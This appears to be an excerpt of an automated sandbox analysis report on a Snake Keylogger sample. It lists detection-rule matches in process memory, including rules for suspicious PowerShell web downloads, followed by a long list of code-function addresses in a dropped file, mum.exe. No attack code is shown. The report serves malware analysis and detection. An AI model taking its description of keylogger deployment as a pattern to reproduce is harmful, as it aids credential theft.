          Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000002.937344564.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 2016, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 2572, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Process Memory Space: powershell.exe PID: 2572, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 684, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Process Memory Space: powershell.exe PID: 684, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_002405888_2_00240588
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_002436998_2_00243699
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_002409118_2_00240911
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_002419908_2_00241990
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_00241CA28_2_00241CA2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_0024A8F08_2_0024A8F0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_0024A9008_2_0024A900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_00241A318_2_00241A31
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_00243FA08_2_00243FA0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_048B89A08_2_048B89A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_048B58FE8_2_048B58FE
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_048B00488_2_048B0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_054C00488_2_054C0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_054C6C528_2_054C6C52
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 8_2_054C00068_2_054C0006
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CE44015_2_002CE440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CE89C15_2_002CE89C
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CECF015_2_002CECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CC17F15_2_002CC17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C357615_2_002C3576
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CF14815_2_002CF148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C915115_2_002C9151
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CF5A415_2_002CF5A4
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CF9FB15_2_002CF9FB
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CC5DC15_2_002CC5DC
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C262015_2_002C2620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C3A3815_2_002C3A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CCA3015_2_002CCA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C4E5815_2_002C4E58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CCE8815_2_002CCE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C3E9815_2_002C3E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CD2E015_2_002CD2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C42F915_2_002C42F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CD73815_2_002CD738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C2F1815_2_002C2F18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C475815_2_002C4758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CDB9015_2_002CDB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002CDFE815_2_002CDFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C89C815_2_002C89C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C89D815_2_002C89D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_002C1B4815_2_002C1B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E683815_2_003E6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003ED23815_2_003ED238
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EA62015_2_003EA620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E7E1815_2_003E7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E381015_2_003E3810
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E160015_2_003E1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E827015_2_003E8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EAC6815_2_003EAC68
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E1A5815_2_003E1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E525815_2_003E5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E004815_2_003E0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E1EB015_2_003E1EB0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EB2B015_2_003EB2B0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E04A015_2_003E04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E6C9015_2_003E6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E08F815_2_003E08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E56D815_2_003E56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E86C815_2_003E86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E5B3015_2_003E5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E2D2015_2_003E2D20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E8B2015_2_003E8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E711015_2_003E7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E450015_2_003E4500
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EB90015_2_003EB900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E8F7815_2_003E8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E756815_2_003E7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E0D5015_2_003E0D50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EBF5015_2_003EBF50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E11A815_2_003E11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EC5A015_2_003EC5A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E5F8815_2_003E5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E998015_2_003E9980
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003ECBF015_2_003ECBF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E63E015_2_003E63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E9FD015_2_003E9FD0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E79C015_2_003E79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E682815_2_003E6828
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E001215_2_003E0012
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003EA61015_2_003EA610
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E7E0915_2_003E7E09
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E380015_2_003E3800
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E826015_2_003E8260
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E1A4C15_2_003E1A4C
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E86B815_2_003E86B8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E349815_2_003E3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E049015_2_003E0490
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E348915_2_003E3489
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E6C8015_2_003E6C80
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E44F015_2_003E44F0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E08E815_2_003E08E8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E56D015_2_003E56D0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E5B2015_2_003E5B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E2D1315_2_003E2D13
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E8B1015_2_003E8B10
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E710215_2_003E7102
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E5F7815_2_003E5F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E8F6915_2_003E8F69
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E755815_2_003E7558
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E0D4115_2_003E0D41
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E79B115_2_003E79B1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E119815_2_003E1198
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E15F115_2_003E15F1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 15_2_003E63D115_2_003E63D1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027058819_2_00270588
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027369919_2_00273699
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027091A19_2_0027091A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027199019_2_00271990
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00271CA219_2_00271CA2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00276E3019_2_00276E30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_002762A719_2_002762A7
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027284019_2_00272840
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027A8F019_2_0027A8F0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0027A90019_2_0027A900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00271A3119_2_00271A31
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00273FA019_2_00273FA0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00F089A019_2_00F089A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_00F0004819_2_00F00048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_05356C5019_2_05356C50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 19_2_0535004819_2_05350048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CE44026_2_001CE440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CE89A26_2_001CE89A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CECF026_2_001CECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C915126_2_001C9151
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CF14826_2_001CF148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CC17F26_2_001CC17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C357626_2_001C3576
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CF5A226_2_001CF5A2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CF9FA26_2_001CF9FA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CC5E226_2_001CC5E2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C3A3826_2_001C3A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CCA3026_2_001CCA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C262026_2_001C2620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C4E5826_2_001C4E58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C3E9826_2_001C3E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CCE8826_2_001CCE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C42F926_2_001C42F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CD2E026_2_001CD2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C2F1826_2_001C2F18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CD73826_2_001CD738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C475826_2_001C4758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CDB9026_2_001CDB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001CDFE826_2_001CDFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C89D826_2_001C89D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C89C826_2_001C89C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_001C1B4826_2_001C1B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EA62026_2_002EA620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E683826_2_002E6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002ED23826_2_002ED238
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E160026_2_002E1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E7E1826_2_002E7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E381026_2_002E3810
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EAC6826_2_002EAC68
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E827026_2_002E8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E004826_2_002E0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E1A5826_2_002E1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E525826_2_002E5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E04A026_2_002E04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E1EB026_2_002E1EB0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EB2B026_2_002EB2B0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E6C9026_2_002E6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E08F826_2_002E08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E86C826_2_002E86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E56D826_2_002E56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E2D2026_2_002E2D20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E8B2026_2_002E8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E5B3026_2_002E5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E450026_2_002E4500
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EB90026_2_002EB900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E711026_2_002E7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E756826_2_002E7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E8F7826_2_002E8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E0D5026_2_002E0D50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EBF5026_2_002EBF50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E11A826_2_002E11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EC5A026_2_002EC5A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E5F8826_2_002E5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E998026_2_002E9980
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E63E026_2_002E63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002ECBF026_2_002ECBF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E79C026_2_002E79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E9FD026_2_002E9FD0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E682826_2_002E6828
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E7E0926_2_002E7E09
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E001226_2_002E0012
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002EA61126_2_002EA611
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E826026_2_002E8260
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E1A4A26_2_002E1A4A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E1EAA26_2_002E1EAA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E86B826_2_002E86B8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E348926_2_002E3489
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E6C8026_2_002E6C80
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E349826_2_002E3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E049026_2_002E0490
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E08E826_2_002E08E8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E44F026_2_002E44F0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E5B2026_2_002E5B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E710226_2_002E7102
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E2D1226_2_002E2D12
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E8B1026_2_002E8B10
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E8F6926_2_002E8F69
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E5F7826_2_002E5F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E0D4126_2_002E0D41
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E755826_2_002E7558
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E79B126_2_002E79B1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E119826_2_002E1198
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E15F126_2_002E15F1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 26_2_002E63D126_2_002E63D1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C058829_2_002C0588
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C369929_2_002C3699
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C091129_2_002C0911
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C199029_2_002C1990
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C1CA229_2_002C1CA2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C057729_2_002C0577
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C284029_2_002C2840
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002CA8F029_2_002CA8F0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002CA90029_2_002CA900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C1A3129_2_002C1A31
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_002C3FA029_2_002C3FA0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_00EC89A029_2_00EC89A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_00EC004829_2_00EC0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 29_2_0512004829_2_05120048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025E44034_2_0025E440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025E89A34_2_0025E89A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025ECF034_2_0025ECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025356134_2_00253561
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025C17F34_2_0025C17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025F14834_2_0025F148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025915134_2_00259151
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025F5A234_2_0025F5A2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025F9FA34_2_0025F9FA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025C5DA34_2_0025C5DA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025262034_2_00252620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025CA3034_2_0025CA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_00253A3834_2_00253A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_00254E5834_2_00254E58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025CE8834_2_0025CE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_00253E9834_2_00253E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025D2E034_2_0025D2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_002542F934_2_002542F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025D73834_2_0025D738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_00252F1834_2_00252F18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025475834_2_00254758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025DB9034_2_0025DB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_0025DFE834_2_0025DFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_002589C834_2_002589C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_002589D834_2_002589D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_00251B4834_2_00251B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F1A5834_2_005F1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F525834_2_005F5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F0D5034_2_005F0D50
